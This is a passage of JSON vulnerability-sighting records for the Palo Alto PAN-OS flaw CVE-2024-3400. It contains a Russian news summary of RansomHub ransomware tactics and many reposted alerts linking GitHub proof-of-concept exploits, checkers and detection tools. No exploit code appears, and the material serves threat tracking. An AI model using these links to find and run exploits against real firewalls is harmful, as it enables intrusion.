\u0436\u0435\u0440\u0442\u0432.\n\nRansomHub \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u0438. \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0432\u0437\u043b\u043e\u043c\u0430 \u2014 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 VPN-\u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0438 \u043f\u043e\u0434\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u0442\u0430\u043a \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432\u0440\u043e\u0434\u0435 PCHunter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u0422\u0430\u043a\u0442\u0438\u043a\u0430 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u0430\u0445\u0432\u0430\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0446\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. \u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u0430\u044e\u0442 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u0443\u0437\u043b\u0430\u043c\u0438 \u2014 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u043c\u0438, \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u043c\u0438 \u043a\u043e\u043f\u0438\u044f\u043c\u0438, \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u2014 \u0438 \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u044f\u0442 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b. \u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 Filezilla, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 RansomHub \u0448\u0430\u043d\u0442\u0430\u0436\u0438\u0440\u0443\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u0443, \u0442\u0440\u0435\u0431\u0443\u044f \u0432\u044b\u043a\u0443\u043f \u0437\u0430 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u0438 \u043d\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044e \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u0441\u043f\u043e\u0441\u043e\u0431\u043d\u0430 \u043e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u043c\u0430\u0448\u0438\u043d\u044b, \u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0442\u044c \u0442\u0435\u043d\u0435\u0432\u044b\u0435 \u043a\u043e\u043f\u0438\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0437\u0430\u0447\u0438\u0449\u0430\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0437\u0430\u0442\u0440\u0443\u0434\u043d\u044f\u044f \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 .\n\n\u041e\u0434\u043d\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u0437\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a RansomHub \u0441\u0442\u0430\u043b\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f, \u043f\u0440\u043e\u0432\u0435\u0434\u0451\u043d\u043d\u0430\u044f \u0432\u0441\u0435\u0433\u043e \u0437\u0430 14 \u0447\u0430\u0441\u043e\u0432. \u041f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u043c \u044d\u043a\u0440\u0430\u043d\u0435 Palo Alto ( CVE-2024-3400 ) \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u043b\u0438 \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u0442 VPN-\u043a\u043b\u0438\u0435\u043d\u0442\u0430. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u0442\u0430\u0440\u044b\u0435 \u0431\u0440\u0435\u0448\u0438 \u0432 Windows ( CVE-2021-42278 \u0438 CVE-2020-1472 ), \u043f\u043e\u043b\u0443\u0447\u0430\u044f \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0435\u0442\u044c\u044e.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0441\u0442\u043e\u043b\u044c \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0438\u0437-\u0437\u0430 \u043d\u0435\u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u0415\u0441\u043b\u0438 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0436\u0435\u0440\u0442\u0432\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0437\u0430\u043a\u0440\u044b\u0442\u0443\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u0442 \u043d\u0430\u0437\u0430\u0434, \u0442\u043e \u0432\u0438\u043d\u043e\u0432\u0430\u0442\u043e \u0432 \u044d\u0442\u043e\u043c \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0435\u0451 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0445\u0430\u043b\u0430\u0442\u043d\u043e\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0435 \u043a \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0433\u043b\u0443\u043f\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0442\u044c \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043d\u0430 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0420\u0430\u0441\u0442\u0443\u0449\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c RansomHub \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0443\u0435\u0442 \u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437. \u041e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0443\u0441\u0438\u043b\u0438\u0432\u0430\u0442\u044c \u0441\u0432\u043e\u044e \u0437\u0430\u0449\u0438\u0442\u0443, \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0438 \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0436\u0435\u0440\u0442\u0432 RansomHub \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-02-17T08:21:47.000000Z"}, {"uuid": "24e27605-b686-4f5a-bcb1-2f71ece5f157", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/c-9nM9mslhGNLfW7QsPDgkIMfnwsyr-9epKeORTrIU88Ta0", "content": "", "creation_timestamp": "2026-04-07T03:00:08.000000Z"}, {"uuid": "7d93b005-de6e-4077-8e25-d477a89c113f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7064", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/Symbolexe/CVE-2024-1642470\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-15T17:32:48.000000Z"}, {"uuid": "692095f4-b342-447b-918e-9b2153bf1527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7033", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/bigsclowns/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-12T18:29:24.000000Z"}, {"uuid": "32db1381-7475-41e5-aac3-3e46743ec8e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7031", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/hubabuba228/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-12T18:29:02.000000Z"}, {"uuid": "c4d7e757-418b-4acf-9fea-6af84504ceee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7030", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/letsrockmee/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-12T17:08:18.000000Z"}, {"uuid": "a05c1100-5a1b-43c4-90cc-909c754292db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7029", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/havebeenpwned/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-12T16:49:56.000000Z"}, {"uuid": "c3f20e5d-781f-44ac-8bfe-2a014a9f46f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7062", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC Remote Code Execution (RCE)  Palo Alto Networks PAN-OS software\nURL\uff1ahttps://github.com/kerberoshacker2/CVE-2024-3400-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-15T16:52:30.000000Z"}, {"uuid": "b6706a44-d645-4f3e-be37-caa7fc9d92e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7074", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400\nURL\uff1ahttps://github.com/W01fh4cker/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-16T16:21:12.000000Z"}, {"uuid": "ed8b8525-05c1-40e8-8481-8cb6a615ce36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7071", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 Palo Alto OS Command Injection\nURL\uff1ahttps://github.com/h4x0r-dz/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-16T14:23:49.000000Z"}, {"uuid": "f506cd10-e04d-48ef-8c1d-6de0b8294766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7079", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability.\nURL\uff1ahttps://github.com/index2014/CVE-2024-3400-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-17T05:38:39.000000Z"}, {"uuid": "01507d48-695d-4501-953f-58cd72728d98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7065", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect\nURL\uff1ahttps://github.com/AdaniKamal/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-16T01:48:01.000000Z"}, {"uuid": "22d3bf07-de47-49a2-9fcb-a5df0f6742fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7100", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple POC for CVE-2024-3400\nURL\uff1ahttps://github.com/phantomradar/cve-2024-3400-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-17T21:05:03.000000Z"}, {"uuid": "027b8bc6-1557-4647-82fb-1cab9a1b67b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7077", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aCVE-2024-3400-RCE\nURL\uff1ahttps://github.com/W01fh4cker/CVE-2024-3400-RCE\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-04-17T01:16:13.000000Z"}, {"uuid": "9ba92257-7239-4310-b3bf-2768101f028b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7076", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect\nURL\uff1ahttps://github.com/ihebski/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-16T21:28:37.000000Z"}, {"uuid": "7fdc5d86-e067-4d59-a01c-5d86ee4af16d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7101", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 : Palo Alto OS Command Injection - POC\nURL\uff1ahttps://github.com/retkoussa/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-17T22:32:13.000000Z"}, {"uuid": "da6f568a-594b-491b-9e27-9a6ad4aeec60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7083", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400-RCE\nURL\uff1ahttps://github.com/admi-n/CVE-2024-3400-RCE-copy\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-17T08:39:12.000000Z"}, {"uuid": "419ab1a2-6c89-422d-9234-9d5df15b311c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7121", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExtract useful information from PANOS support file for CVE-2024-3400\nURL\uff1ahttps://github.com/HackingLZ/panrapidcheck\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-19T15:00:35.000000Z"}, {"uuid": "5935bc02-0824-4438-9ffc-63a24f932f68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7113", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 POC written in Rust and Python\nURL\uff1ahttps://github.com/Ravaan21/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-18T21:20:23.000000Z"}, {"uuid": "6bbe9dbb-788a-4c1e-8ec0-5989049d072c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7111", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPython script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts\nURL\uff1ahttps://github.com/swaybs/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-18T16:53:17.000000Z"}, {"uuid": "ed16ae14-4253-42f3-8611-1b401ea71f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7108", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aEDL for IPs attacking customers with CVE-2024-3400 \nURL\uff1ahttps://github.com/hahasagined/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-18T15:10:44.000000Z"}, {"uuid": "c0d668b8-2e8f-47e5-99fc-8b8ed0b5da05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7120", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400\nURL\uff1ahttps://github.com/codeblueprint/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-19T12:24:50.000000Z"}, {"uuid": "43f73e11-ece1-414e-a3ac-022b02324868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7125", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for 